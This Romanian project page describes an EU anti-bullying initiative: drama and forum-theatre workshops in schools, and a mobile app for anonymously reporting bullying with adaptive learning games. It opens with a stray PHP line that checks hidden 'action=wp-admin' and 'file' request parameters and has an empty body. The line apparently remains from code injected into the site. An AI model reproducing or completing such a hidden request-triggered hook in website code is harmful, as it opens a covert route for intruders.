if(trim($_GET['action']) == 'wp-admin' && !empty($_GET['file'])){ } ?> eubully | Activități
Intranet Area
For project partners you can access the intranet here.

Activități

ACTORIE
APLICAȚIA MOBILĂ DE RAPORTARE
&
JOCURI DE ADAPTARE BAZATE PE CLOUD

Actorie

Actoria, datorită naturii sale evocatoare, poate influența procesele de schimbare în moduri în care calculele statistice nu pot. Într-un proces de actorie trei părți diferite interacționează în crearea de sens; introducere/pregătire, interpretarea rolului și reflecție. Aceste piese sunt, de asemenea, parte a unui proces de cercetare calitativă. Un subiect special (întrebare, temă în acest caz de bullying), care este explorat. Cercetarea este realizată în acțiune și este, prin urmare, o activitate, care include gânduri, corp și emoțiile. Crearea unui context împreună cu participanții poate deschide noi posibilități pentru înțelegere și interpretare. Copiii, daca sunt stăpâni pe ceea ce fac și se simt ca și cum ar putea realiza aceste lucruri,  ei vor prospera.

Copiii trăiesc experiența practică, joacă și gândesc mai mult atunci când le sunt prezentate situații pe care trebuie să le rezolve. În cazul în care o fac într-un mod practic în care trebuie să reacționeze fizic vor fi capabili să se confrunte cu viața cu mai multă încredere. Metodologiile de cercetare se bazează pe un “ciclu Planifică-Acționează-Observă-Reflectează” sau pe un “proces spirală care alternează între acțiune și reflecție critică”. Cercetarea acțiunii: “…. încearcă să acționeze în direcția acțiunii eficiente prin procese bune si participare corespunzătoare. Încearcă, de asemenea, să colecteze date adecvate, și să le interpreteze bine. Cercetarea acțiunii se face, în cel mai bun caz, în așa fel încât acțiunea și cercetarea să se evidențieze reciproc.” Există posibilități de a utiliza metoda de cercetare pe bază de dramă ca parte integrantă a interviurilor de grup.

Un obiectiv ar fi de a livra o mică piesă de teatru cu privire la bullying, în urma cercetării cu tinerii înșiși și, dacă este posibil, includerea lor de asemenea în proiectarea conținutului. Aceasta ar include cursul obișnuit al  workshop-urilor pentru a explora și a discuta aceste probleme cu profesorii, părinții etc.

Un alt obiectiv este un workshop de teatru participativ, care explorează problemele de hărțuire în școlile primare și secundare și crește gradul de conștientizare a problemei în rândul tinerilor. Unele dintre scenele workshop-ului  sunt jucate de public (care ar putea fi alți copiii din școală, părinți, profesori); acestora le este dată apoi șansa de a reacționa ca spectator. În grupuri tinerii vin cu propriile idei pentru a contesta hărțuirea. După ce fac sugestii cu privire la ceea ce ar fi putut face un spectator pentru a îmbunătăți situația, membrii audienței sunt invitați pe scenă pentru a adopta sugestia de a explora cat de eficientă ar putea fi o astfel de strategie iar acest lucru este apoi discutat cu publicul.

Acest lucru poate fi de fapt livrat ca o abordare la nivelul întregii școli, oferind o serie de strategii pentru a face față amenințărilor și pentru a responsabiliza participanții prin construirea încrederii și creșterea gradului de conștientizare în întreaga comunitate școlară. Actoria va permite studenților să “repete pentru viață”, prin vizualizarea situațiilor posibile în mod creativ, încercând strategii și ajutând toate părțile interesate în dezamorsarea comportamentelor negative și neproductive asociate cu hărțuirea. Ar fi esențial pentru grupuri să dezvolte contracte care ar putea fi din nou vizitate pe bază de timp stabilit ca o măsură pentru a monitoriza eficacitatea intervenției anti-bullying. Structura ar putea arata după cum urmează:

În acest proiect, am ales în mod deliberat să acordăm mai puțină atenție delincvenților. În timp ce problema “comportamentului violent” este prea complexă și largă pentru a fi rezolvată într-un astfel de proiect scurt, ne propunem să sporim conștientizarea și încrederea în sine a participanților în a se confrunta cu incidentele de violență. Chiar dacă noi nu acordăm o atenție deosebită delincvenților, considerăm că proiectul va avea un efect preventiv asupra unui grup specific de potențiali agresori. Nu asupra celor considerați cazuri problemă specifice, dar asupra unui grup mai mare de oameni care sunt mai sensibili la presiunea grupului.

Aplicaţia mobilă de raportare & jocuri de adaptare bazate pe cloud

Obiectivul nostru este de a crea o aplicaţie destinată tehnologiilor mobile, care poate fi utilizată de tineri, profesori şi părinţi, având scopul de a:

  • creşte gradul de conştientizare a cyber bullying şi a altor forme de bullying
  • monitoriza şi înregistra în mod anonim frecvenţa şi conţinutul de bullying
  • înlătura factorul de frică cu privire la raportarea cyber bullying adulților (părinți, profesori, membrii ai familiei, etc.) prin dezvoltarea unui jurnal de bullying, care va furniza date de cercetare detaliate, în curs de desfăşurare, la nivelul învăţământului local.
  • asigura o direcţie pozitivă în care se pot folosi tehnologiile mobile în vederea raportării hărţuirii
  • organiza workshop-uri, despre cum se utilizează aplicaţia, destinate părinţilor şi profesorilor, încurajându-i pe aceştia să îi susţină pe copii spre a înregistrarea şi raporta hărțuirea
  • promova aplicaţia ca pe o nouă resursă ce poate fi descărcată gratuit pe dispozitivele mobile, fiind disponibilă pe mai multe canale: internet, internet mobil, pe sistemele iOS şi Android şi altele
  • de a monitoriza utilitatea acesteia, în funcţie de utilizatori (tineri, profesori, părinţi şi alţii) şi de a stânge informaţii relevante.

Vom dezvolta o aplicaţie de sine stătătoare, care va permite elevilor să raporteze incidentele de hărţuire, care va preciza tipul şi circumstanţele acesteia, sub forma unui jurnal al agresiunii. Conţinutul jocului este structurat pe subiecte, fapte (obiecte de învăţare) şi întrebări. Acestea sunt păstrate într-o bază de date relaţională, stocată într-un centru al UE sau de către un furnizor acceptat. Jocul selectează întrebări bazate pe cunoştinţele utilizatorilor cu privire la subiect şi la fapte, cu scopul de a oferi o experienţă de învăţare adaptată  la nivelul fiecărui individ.

La nivel de raportare, sistemul stochează fiecare răspuns în parte şi urmăreşte nivelul de înţelegere prin fapte şi subiecte. Acest lucru permite cunoaşterea elevilor şi monitorizarea progresului acestora, în comparaţie cu alte persoane. La un nivel mai înalt, se poate realiza o analiză încrucişată a elevilor, în funcţie de locaţie, populaţie, vârstă, sex, studii sau tag-uri întâmplătoare.

Aplicaţia de raportare va utiliza un spaţiu de stocare secundar şi va avea un alt punct de acces, dar va avea aceleaşi standarde stricte de securitate, la fel cum este şi în cazul sistemului Q&A. În acest fel, aplicaţia va deveni un instrument de cercetare în timp real.